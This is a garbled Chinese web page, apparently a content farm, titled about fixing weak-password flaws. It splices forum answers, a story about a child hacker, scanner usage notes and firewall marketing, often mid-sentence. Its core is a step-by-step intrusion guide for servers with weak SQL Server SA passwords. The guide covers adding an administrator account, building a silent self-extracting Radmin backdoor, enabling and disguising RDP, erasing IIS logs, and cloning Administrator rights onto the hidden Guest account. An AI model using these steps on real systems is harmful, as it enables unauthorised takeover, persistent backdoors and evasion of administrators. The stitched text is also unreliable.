弱口令漏洞如何解决_弱口令密码问题,怎么解决

局域网无弱口令入侵，请较高人

将Guest克成权限，克成权限的方法:

1.你要有对方的管理级用户名.密码

弱口令漏洞如何解决_弱口令密码问题,怎么解决

弱口令漏洞如何解决_弱口令密码问题,怎么解决

账号和密码（先不说你怎么得到的账号和密码），但是你得有一个连接或者登入对方系统的通道，这个通道就是SHELL，例如TELNET、3389、FTP。。。

2.有能得到SHELL的漏洞（TELNET、远程登陆...）

这2个条件缺一不可。

现在XP系统已经算是很安全了，入侵真的不那么容易，都不如木马来的快。

其实你也可以从侧面来入侵，例如：你得到了对方的账号和密码，你可以猜测他的邮箱、QQ....或者找到他常登陆的网站，给那个网站植入网马（我通过这个方法成功过），等等

.补充：

1.你建立的IPC连接应该是空连接，那就借助软件账户、密码。

2.当然了，除了2000系统，很少有开3389的。更不要说TELNET了，普通用户是不会开这种服务的。就算需要用远程登陆，也不会开3389，而是借助PCANYWHERE等软件或者把远程登陆端口改掉。

3.SHELL就是外壳程序。

你得到了

这些都可以加载一个SHELL，这样你的账户才能有执行的权限，例如对方只开了80端口，你虽然有账户，但是你只是和对方建立了一个连接，80端口得不到SHELL（有些可以利用溢出得到，有些WEB有这个漏洞），这样你还是无能为力。

个人拙见，仅供参考。

最小黑客汪正扬：因不想写作业黑掉校园网，如今怎样了呢？

-p: 扫描标准端口(端口列表可通过datconfig.ini文件定制)；最小的黑客“天才”

2011年，年仅10岁的汪正扬，利用自己省下来的400多块的冰棍钱，买下来一台现成的网络主机。之后的他，便在这台网络主机上储存自己写来自娱自乐的程序，在2013年，汪正扬开始学习并创办出了自己的个网站。

因为汪正扬的父母都不是搞计算机的，对于技术上的事想管也管不了。在遇到汪正扬在没完成作业的情况下就去编程序和办网站，他的父母还是会说他几句。可汪正扬每次都会跟父母解释说，这个做出来以后会有很大的用途，而且做这个事以后一定会有前途的。久而久之，他的父母也就没有再管过他了。

曾有媒体，12岁的汪正扬，因为对学校布置的作业感到不满，便用自己开发完成的程序黑掉了学校的网站系统，以此宣泄自己的不满。这件事情发生后，汪正扬也受到了他应该得到的惩罚——要做更多的作业。

当时有的人认为这个处罚太轻了，而校方给出的解释是汪正扬的行为算是一个小学生的恶作剧行为，并且没有对学校造成什么损失，不必过于追究，只需给予口头教育和加大作业量。

几年后这事再被网友提起时，汪正扬给出的回复是当时做出这种事是因为自己的思想未成熟，现如今，自己都觉得当初黑掉学校网站的行为是多么的幼稚可笑。此外，他还透露自己当初并不是因为不想写作业而黑掉学校网站。

当时的答题系统是学校买给高中部用的，他作为初中部的学生，是不用那种系统的。之所以会被媒体误解是因为他当时开玩笑的说了“这回高中部的同学可以不用写作业了”。

2014年，就读于清华附中初一的汪正扬，做了一件让他名声大噪的事。在那之前，他就已经时常看到一些说哪家的网站被哪个黑客利用漏洞攻克了，作为从小就是喜欢编程的他，很好奇别人是怎么利用漏洞攻克网站的。

为了找到这个原因，之后的他便一直热衷于在网上找漏洞，有一次他发现了一个漏洞，并利用这个漏洞把价格0元的商品以1分的价格购买了。他这么做并不是为了贪图便宜，而是希望能把这些漏洞找出来，并进行上报。所以，在他提交完漏洞后，就把密码退回去了，没换取任何商品。

之后他更是发现了百家教育允许入侵者查看任意学生的学分、成绩等信息的漏洞，并把它报告给了360库带。这也是360库带截至目前遇到的漏洞报告者中，年龄最小的一位。据当时的360库带的安全工程师计东的描述，汪正扬发现的漏洞是一个弱口令漏洞，造成这样的情况主要是因为教师的使用方法不正确。

严格来看，汪正扬上报的弱口令漏洞并不能算真正的安全网络漏洞，是一种比较普遍存在的安全隐患。可对于一个年仅13岁的初一学7、将Rad.rar制作成自解压文件；生来说，能发现这样的安全隐患已经是非常了不起的了，他的网络技术以及网络安全意识都已经远超同龄人，实属不易。

不久后，汪正扬被评上了“网安启明星”工程的学员，也此被邀请参加了互联网大会。在参加这次会议之后，汪正扬正式被人誉为最小的黑客天才。

别人送我几个SA弱口令，要怎么连接啊？

工具:WINNTAutoAttack自动攻击器（扫漏洞）；SQLTOOLS（SA空口令连接器）；RAMDIN影子3.0中文版（远程控制程序）（R注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA

6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23）；SC.exe port.bat query.exe quser.exe（隐藏3389服务及 不让管理发现自己程序）；CleanIISLog.exe（小榕的擦PP程序）；3389.exe（开3389端口服务的）；psu.exe（使用被禁止的Guest帐户要用到的）；mstsc.exe（远程桌面连接程序）。

一.扫到SA弱口令(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start net

开net服务

net user mint mint /add

mint net localgroup administrators mint /add

将帐号mint升级为

三.上传后门程序RAD.EXE(R服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sr.exe；

2、在本地设置服务端（一定要生成）；

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINESYSTEMRadmin的键值为1.reg；

4、编写一个批处理，并命名为u.bat；

@echo offnet stop r_server

5、写第二个批处理，r.bat,内容为：

@echo off@Explorer.exe /

uninstall /silence@Explorer.exe /install /

silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /

silence@Explorer.exe /install /silence@regedit /

s 1.reg@net start r_server@del

rad.exe@del 1.reg@del r.bat@del u.bat

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sr.exe改名) u.bat r.bat压缩成Rad.RAR压缩包；

选择Default.sfx的自释放模块-->>高级自释放选项

-->>常规

释放路径:%root%32

安装程序:释放后运行:r.bat 释S一般别人给你弱口令的计算机都是有其他顾客的，所以你不要去登录了，那样只是徒劳放前运行u.bat

-->>摸式

缄默模式:全部隐藏 覆盖方式:覆盖所有文件

-->>确定-->>确定

生成完成。

四.用RAddos防护办法？DMIN端连接

上传文件到c:WINNT(XP是windows):

query.exe quser.exe

SC.exe

3389.exe

psu.exe

再上传一个反弹后门R进入TELNET。

运行c:winnt3389.exe，重启肉鸡。

五.重启后用远程桌面远程器连上去

这里就有时会出现个问题。

使用3389登陆，发现登陆用户已满，不用怕，我们把他踢出去。

找到c:winnt32cmd.exe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint，net对方ip，直接可以登陆对方电脑了。

使用命令：

c:query user (查看对方目前终端登陆状况。)

再用c:query user检查一便~~(这就是为什么不马上用1.bat了)

六.连上后..在cmd下运行

c:winntlog . 自己的IP .(擦PP)

c:winnet1.bat (删除覆盖查看当前在线用户文件)

七.打SA空口令补丁

程序-->>Microsoft SQL -->>查询分析器(有放大镜的)

-->>Windowst身位验证登陆

一下代码:SELMIS

if exists (select from dbo.sysobjects where id

= object_id(N’[dbo].[xp_cmdshell]’)

and OBJECTPROPERTY(id, N’IsExtendedProc’)

= 1) exec sp_dropextendedproc N’[dbo].[xp_cmdshell]’GO

八.改3389端口和服务名称

修改端的端口设置，注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal WdsrdpwdTdstcp]，PortNumber值，默认是3389，选择10进制，修改成所希望的端口，比如1314。

第二个地方：

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal WinStationsRDP-Tcp]PortNumber值，默认是3389，选择10进制，修改成所希望的端口，比如1314。

要重启系统才能用新端口连。(不急..改了他的服务名再重启系统吧)

导出3389服务的

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServsTermServ]

的键值为mm.reg文件。编辑mm.reg文件，替换TermServ为Alerter(错误服务..别的服务也行) 。再把第十行的"Description"="(这里是服务说明，改为你所换的服务说明，这里改为通知所选用户和计算机有关系统管理级警报。)"第十一行的"DisplayName"="(这里是服务名称，改为你所换的服务名称，这里改为Alerter)。保存，再导入注册表(这里要先运行Servs.msc(可在CMD下打这命令)器..把Alerter的服务先停止)。

再在CMD下

CD c:winnt

32 copy termsrv.exe serv.exe

(这里是termsrv.exe为Alerter服务文件名不多的文件)

CD C:winnt sc 127.0.0.1 config Alerter binpath=

c:winnt32serv.exe

(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)

九.注消后(注消比直接关要好些)用Radmin重启肉鸡

十.使用被禁用的帐户[Guest]登陆，删除自己开始建的帐号

1.使用psu.exe展开注册表到

HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers

用法：[psu -p regedit -i pid]

Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值。

如：psu –p regedit –i 157

找到HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesAdministrator的类型值。

在HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers下找到这个类型值在数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)。

导出Guest的配置(也就是导出HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersGuest和他相应的类型值的数据)，然后删除Guest的配置。

3.将Guest的配置(二个REG文件导进注册表)。

4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]。

net user Guest

[修改密码]net user Guest /

active:yesnet user Guest /active:no[命令行下禁用Guest]

5.实验被禁止的帐户Guest是否可用。

6.用Guest登陆后删除自己建的帐号。

net user mint /del

整个过程结束。

把R的服务也改了，多留个后门多条路，呵呵。整个过程全部结束，这机子就真正变成你的肉鸡了

直接用sqltools连接就可以了，然后建立用户，至于开3389那就是个人爱好了一般的有SA弱口令的机器上，估计马、客户……不会少，你可以帮他清理一下，自己留一个隐蔽点的后门。把机器弄干净点，不要破坏和随意修改。很多朋友都认为SA弱口令的机器，就像菜市场，不必清除脚印，不过我个人认为还是清除的比较好一些，有时候，一些小的，由于懒，或者本身不是没有重要资料，所以不去修改密码或打补丁。并不代表他不看这些东西。如果比较稳定的服，可以花点心思帮他维护~。。~

如何处理ddos攻击如何处理ddos

添加用户mint密码为

2、域名解析功能障碍灾备：当根域、域发生故障不能正常服务时，甚至所有外部的授权都出现故障时，某公司下一代防火墙DNS系统仍可以作为解析孤岛，提供正常的域名解析服务。

c:logoff 1(踢出去一个管理者)

3、DNS安全策略联动：对重点域/域名的解析请求进行跟踪，当出现异常情况时，启动相关安全联动措施，仅对正常域名进行应答服务。

4、DNS放大攻击防护：当某IP流量异常突增时，自动启动IP分析和安全联动措施，对该IP限速，对应答结果修剪，有效防止DNS成为放大攻击源。

5、多线路流量调度灾备：能够针对有多线路出口的客户，可配置不同的出口策略。

6、弱凭证感知：当合法用户通过弱口令登录各类应用管理系统时，会被智能感知并通知安全存在弱口令安全风险，从而提高账号安全等级。

7、漏洞攻击防护：当攻击者对企业信息资产进行口令枚举或系统漏洞攻击时能很快被检测到攻击行为，并形成有效的防御。

8、僵尸网络检测：当组织内部员工通过即时通讯工具或邮件的方式接收到了恶意软件，在恶意软件与外界发生通讯过程中能很快被检测出来，进而有效保护组织内部信息不被外泄。

9、APT定向攻击检测：某公司下一代防火墙可以通过多种流量识别算法对APT定向攻击和ZeroDay攻击及传输过程中的恶意软件进行有效检测，将APT攻击拒于千里之外。

网站总是被黑客攻击后，修改一些用户名和密码，如何防止？

port.bat(如果是在XP下，这个要把里面的WINNT改为Windows)

源码有问题 看你说的 修改一些用户名 我认为是源码有后门漏洞导致，处理不了就从新开发新的。

2.查看计算机管理中帐户列表，刷新这时候会出现错误[找不到帐户](跳过这步也行)。

网站被黑客攻击，说明你的网站存在很多安全隐患，漏洞之类的，就算登录找到源文件修复了，也会被黑客再次入侵，所以只有把网站的所以漏洞找出来进行修复，防止黑客的攻击，避免安全发生，造成网页挂马、网页内容被篡改、数据泄露等，可以找专业的网络安全公司来服务！国内也就Sinesafe和绿盟等安全公司 比较专业.

被挂话，要怎么处理？

net对方ip，发现需要 NTLM 身份验证。我们在自己的电脑里建立一个帐号mint密码为mint身份为。

装个网站安全狗，然后查杀下，就可以清除掉了。并且开启网马防护功能，可以从浏览、上传、挂马等方面进行全面的防护。

上面的这些参数都是需要大家来学习掌握的

此外，可以开启网站后台管理页面的登陆保护功能。这样可以确保网站更为安全哈

分析X-Scan，写出它的使用方法以及配置方法，同时抓包分析其扫描原理。如果有兴趣分析一下其脚本

.命令行：Xscan -h [起始地址]-[终止地址] [扫描选项]

这里如果只对一个ip进行扫描 就不需要填 终止地址了

扫描选项 这里 可以一次填多个 选项

[扫描选项]含义如下：

-b: 获取开放端口的banner信息，需要与-p参数合用；

-c: 扫描CGI漏洞；

-r: 扫描RPC漏洞；

-s: 扫描SQL-SERVER默认帐户；

-g: 尝试弱口令用户连接(若远程主机作系统为Windows NT4.0/2000)；

-a: 扫描以上全部内容；

-x [:端口]: 通过扫描CGI漏洞；

-t: 设置线程数量，默认为20个线程；

-v: 显示详细按F5(运行)，关了退出SQL 再用SQL 身位验证进一次，退出(这是为了不留下记录)。扫描进度；

-d: 禁止扫描前PING被扫主机。

2.示例：

Xscan -h 222.222.1.1-222.222.10.255 -a

含义：扫描XXX.XXX.1.1-XXX.XXX.10.255网段内主机的所有信息；

Xscan -h xxx.xxx.1.1 -n -g -t 30

含义：获取XXX.XXX.1.1主机的Netbios信息，并检测NT弱口令用户，线程数量为30；

Xscan -h 211.108.1.1 -p -b -c -x 211.108.2.255:80 -v -d

我们来试一下

现在我们进行一个简单的cgi漏洞扫描，这次演练是在控制台模式下进行的：xscan 211.100.8.87 -port

这个命令是让xscan扫描211.100.8.87的开放端口，扫描器不会对65535个端口全部进行扫描（太慢），它只会检测网络上最常用的几百个端口，而且每一个端口对应的网络服务在扫描器中都已经做过定义，从返回的结果很容易了解运行了什么网络服务。扫描结果显示如下：

Initialize dy1、DDoS网络攻击防护:当面临大量SYNFlood、UDPFlood、DNSFlood、ICMPFlood攻击时，能迅速封锁攻击源保证正常业务的运行。namic library succeed.

Scanning 211.100.8.87 ......

[211.100.8.87]: Scaning port state ...

[211.100.8.87]: Port 21 is listening!!!

[211.100.8.87]: Port 25 is listening!!!

[211.100.8.87]: Port 53 is listening!!!

[211.100.8.87]: Port 79 is listening!!!

[211.100.8.87]: Port 80 is listening!!!

[211.100.8.87]: Port 110 is listening!!!

[211.100.8.87]: Port 3389 is listening!!!

[211.100.8.87]: Port scan completed, found 7.

[211.100.8.87]: All done.

这个结果还会同时在log目录下生成一个html文档，阅读文档可以了解发放的端口对应的服务项目

网站被百度安全联盟提示高危网站怎么办？网站存在高危漏洞怎么办

可以到安全联盟进行申诉的，申诉的条件就是证明网站的高危问题已经解决，一般申诉完成后就不会标示了。网站有高危漏洞一般是被挂木马和黑链，检查一下程序进行删除就好了

使用waf。比如 网站安全狗，360主机卫士，360w-f: 尝试FTP默认用户登录(用户名及口令可以通过datconfig.ini文件定制)；ebscan

可以重新做一个，或者调程序，望采纳！

重运行命令：装系统。

X-scan的功能

CleanIISLog.exe.exe

采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测，支持插件功能。扫描内容包括：远程服务类型、作系统类型及版本，各种弱口令漏洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等二十几个大类。对于多数已知漏洞，我们给出了相应的漏洞描述、解决方案及详细描述链接，其它漏洞资料正在进一步整理完善中，您也可以通过本站的“安全文摘”和“安全漏洞”栏目查阅相关说明。

-n: 获取NetBios信息(若远程主机作系统为Windows9x/NT4.0/2000)；